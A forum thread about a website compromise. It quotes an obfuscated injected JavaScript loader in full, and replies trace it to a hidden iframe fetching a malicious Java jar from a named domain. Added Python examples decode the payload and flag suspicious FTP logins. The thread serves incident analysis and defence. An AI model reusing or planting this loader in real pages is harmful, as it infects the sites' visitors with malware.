Hacking sites. Arbitrary code inserted?

Good day!


The other day, on several sites (some on CodeIgniter, one on Joomla, one on WordPress and one with no CMS at all) arbitrary code was inserted into the files index.*, home.*, page.*, auth.*. That is, a script tag with arbitrary code was inserted into each of these files. Outwardly it displayed as an invitation to install a new multimedia add-on for the browser.


Here is the script itself (the ! in the word script is mine; without line breaks it did not fit):
<sc!ript type="text/javascript" language="javascript"> wkllp="33933333339999333999339939993933 399993393993993339933939339333333999393339999339399933333 993393933999939339333933999393339933939399993333999393333 939999399333993999339939993399339333933399999333933399399 939333993393939993339399339333993939933933333399993993999 399939939339399339333999393339939333339993933393333333993 333399933333999933333999399399393333993393939939339399339 993993933339993933339993933393333333993333399933333999933 333999399399339933999339339933339399399393993393939933393 399399993999339339933933399339393999339333999393339333333 993999339939999339993993999399339939339399933993993933939 933393399393393993993339939339399939333999933933999393339 333333993933339939339399339333993393339933939399399933399 939939999939339999333393999939993399399939333999933939939 933399339393399999333999933399393393993399339993393399333 393993993939933939339333333993933939933933339999393393339 339993933399339393999333939933933399393993393339333933333 399933993999339339933399339999393393339339939333399939333 999393339993333339993933393999933939999399339933999399939 993339399933393999399939933939399339393999339339933999339 933993393999339933399399399993393999339933399399333993393 999939933339399339333393999339939393399933333993399933933 393339999933399993333939999399393393993399339993393399333 39399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te"; vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="; imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){ bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if( wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3; qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}</sc!ript>



I do not see a direct link between CI, Joomla, WP and plain HTML. That is, apparently it is not a critical vulnerability in any particular engine.


In the Apache logs there are no strange requests, nor indeed any requests at all, around the modification time of the files (+-10 minutes).


Suspicious-looking entries in auth.log (the real username has been changed; the IP is the one the request came from):
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - USER user: no such user found from dslb-094-222-057-074.pools.arcor-ip.net [::ffff:94.222.57.74] to ::ffff:89.108.126.42:21 
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted.
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted.

Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster1: Login successful.
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster2: Login successful.
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.



SSH is closed by the firewall for everyone except me.


So my questions: what could it be? How do I prevent it? What other logs are needed for analysis?
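The obfuscation in the script quoted in the question is light: the long string of '3' and '9' digits is binary (eight characters per byte, '9' is a 1 bit), the `for ... in this` loop finds the `document` property by its length and first/last character codes, and each decoded byte is handed to `document.write`. As an added example that is not part of the original post, here is a Python re-implementation of that decoder plus a scan that pulls the same kind of string literal out of inline script tags; the HTML in the test is constructed, and the decoder strips whitespace so the line-wrapped copy above decodes too.

```python
import re

# The injected script stores its payload as a string of '3' and '9' digits: eight
# characters per byte, most significant bit first, '9' (char code 57) marking a 1 bit.
# Its loop reads eight characters, then steps the index by 3 and again by 5.


def decode_blob(blob: str) -> str:
    """Mirror of the script's decoding loop (wkllp -> document.write)."""
    bits = "".join(blob.split())  # whitespace only comes from line wrapping in the post
    out = []
    for i in range(0, len(bits), 8):
        byte = 0
        for k in range(8):
            # JS reads undefined past the end of the string, which counts as a 0 bit
            byte = (byte << 1) | int(i + k < len(bits) and bits[i + k] == "9")
        out.append(chr(byte))
    return "".join(out)


def encode_blob(text: str) -> str:
    """Inverse of decode_blob; used here only to build constructed test data."""
    return "".join("9" if (ord(c) >> (7 - b)) & 1 else "3" for c in text for b in range(8))


# Inline script bodies, and quoted literals of at least 64 such digits inside them.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
BLOB_RE = re.compile(r'"([39\s]{64,})"')


def find_encoded_scripts(html: str) -> list:
    """Decode every long '3'/'9' string literal found in the page's inline scripts."""
    return [decode_blob(blob) for body in SCRIPT_RE.findall(html) for blob in BLOB_RE.findall(body)]
```

Running `find_encoded_scripts` over the modified index.*, home.*, page.* and auth.* files shows what each injected tag actually writes, without loading the page in a browser.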

7 Answers

It was probably the FTP password. It is very likely that a Trojan settled on the developer's machine and handed the password to the attackers.
How to protect yourself? Switch to Linux on your work stations :) Another option: some hosting companies offer to restrict FTP access to certain IPs — take advantage of this.
And, of course, change the FTP password after a thorough virus scan of all computers where the password might have been.
by
After analyzing the code you gave me in PM:
It writes into the browser:
document.write('');

This redirects to the file gt32.co.cc/games/javaobe.jar, which is detected as Exploit.Java.176
www.virustotal.com/file-scan/report.html?id=8d240bc87e5de0abd6d5872698dd7bfa06bcfee26055e585fd7844fbf3d589a1-1296664900

Analyzing the html:

The variable dskvnds is passed the value Mjjdo##pjuAsVOsVV#wsdMdCRWuL&/W1
Let's take a look at the file through a Java decompiler:
chaketik.pastebin.com/PXkj4Q0J
So far I've only got a few variables; this is the first time I'm digging in Java code ;)

koli=exe. ipol=ridpmt.oi.avaj bsde =eman.so bsda = .exe bsdz = java.io.tmpdir bsdc = os.name

It is interesting that the host has open ports:
5222/tcp open jabber Jabber instant messaging server (Protocol 1.0)
5269/tcp open jabber Jabber instant messaging server (Protocol 1.0)
Keep digging)
by
I deobfuscated your JavaScript; here's what came out:
#teqdk
{
width: 0px;height: 0px;frameborder: no;visibility: hidden;
}
by
This was on an ordinary hosting account. About 4 times a month. It seems the password was not saved anywhere (it had of course been changed before that), but this crap kept appearing again and again.
Suspicion fell on the hosting provider or on our clients (but it is strange that it happened to all of them at once).
It was noticed that the code was added after the tag
We only got rid of it by outputting that tag in parts, like this:
echo '';

The Trojan simply did not find the tag and added nothing.
After changing the hosting provider the problem has not recurred, although the passwords were kept.
by
Maybe you edited the remote code in some warez editor?
I ran into this myself. I edited a bunch of broken files via Dreamweaver and all the files ended up with a leftover variable y.
by
I had exactly the same story. Two of the 6 users who uploaded content to the website had Trojans on their computers. The FTP passwords were stolen from Total Commander. And the users, foaming at the mouth, claimed their computers were clean, Avast was running and they had "just now scanned for viruses." What helped was the FTP logs and disabling the logins one by one.

And as for virus scanning, only scanning after booting from a live CD helps.

The moral: don't trust the users, even if they are not criminals!
by
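Two accounts logged in from one address in the same second, as in the proftpd lines in the question, is the signal the answer above says the FTP logs gave. As an added example that is not part of this thread, here is a Python parser for proftpd auth.log lines of that shape that reports source IPs authenticating to more than one account within a short window; the log sample is constructed with placeholder hosts, addresses and account names.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the shape of the proftpd lines quoted in the question (placeholder data).
SAMPLE_LOG = """\
Jan 31 08:38:45 host proftpd[12006]: Serv (client.example[::ffff:198.51.100.7]) - USER user: no such user found from client.example [::ffff:198.51.100.7] to ::ffff:203.0.113.9:21
Jan 31 08:38:45 host proftpd[12006]: Serv (client.example[::ffff:198.51.100.7]) - SECURITY VIOLATION: root login attempted.
Feb  1 10:56:40 host proftpd[19762]: Serv (::ffff:192.0.2.10[::ffff:192.0.2.10]) - USER webmaster1: Login successful.
Feb  1 10:56:40 host proftpd[19764]: Serv (::ffff:192.0.2.10[::ffff:192.0.2.10]) - USER webmaster2: Login successful.
Feb  2 09:00:00 host proftpd[20001]: Serv (::ffff:192.0.2.55[::ffff:192.0.2.55]) - USER webmaster1: Login successful.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\]: \S+ "
    r"\(.*?\[::ffff:(?P<ip>[\d.]+)\]\) - (?P<msg>.*)$"
)
USER_RE = re.compile(r"USER (?P<user>\S+): (?P<result>.*)")


def parse_proftpd(log: str) -> list:
    """(timestamp, source_ip, user, kind) per line; kind is success/failure/violation/other."""
    events = []
    for m in filter(None, map(LINE_RE.match, log.splitlines())):
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog stamps carry no year
        user, kind = None, "other"
        um = USER_RE.match(m["msg"])
        if um:
            user = um["user"]
            kind = "success" if um["result"].startswith("Login successful") else "failure"
        elif m["msg"].startswith("SECURITY VIOLATION"):
            kind = "violation"
        events.append((ts, m["ip"], user, kind))
    return events


def shared_ip_logins(events: list, window_seconds: int = 60) -> dict:
    """Source IPs logging into more than one account within the window (stolen-password replay pattern)."""
    by_ip = defaultdict(list)
    for ts, ip, user, kind in events:
        if kind == "success":
            by_ip[ip].append((ts, user))
    flagged = {}
    for ip, logins in sorted(by_ip.items()):
        logins.sort()
        for i, (ts, _) in enumerate(logins):
            users = {u for t, u in logins[i:] if (t - ts).total_seconds() <= window_seconds}
            if len(users) > 1:
                flagged[ip] = sorted(users)
                break
    return flagged
```

The flagged accounts are the ones to disable first while the workstations that hold their passwords are checked.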
Look at the last-modified dates of the system files.
by
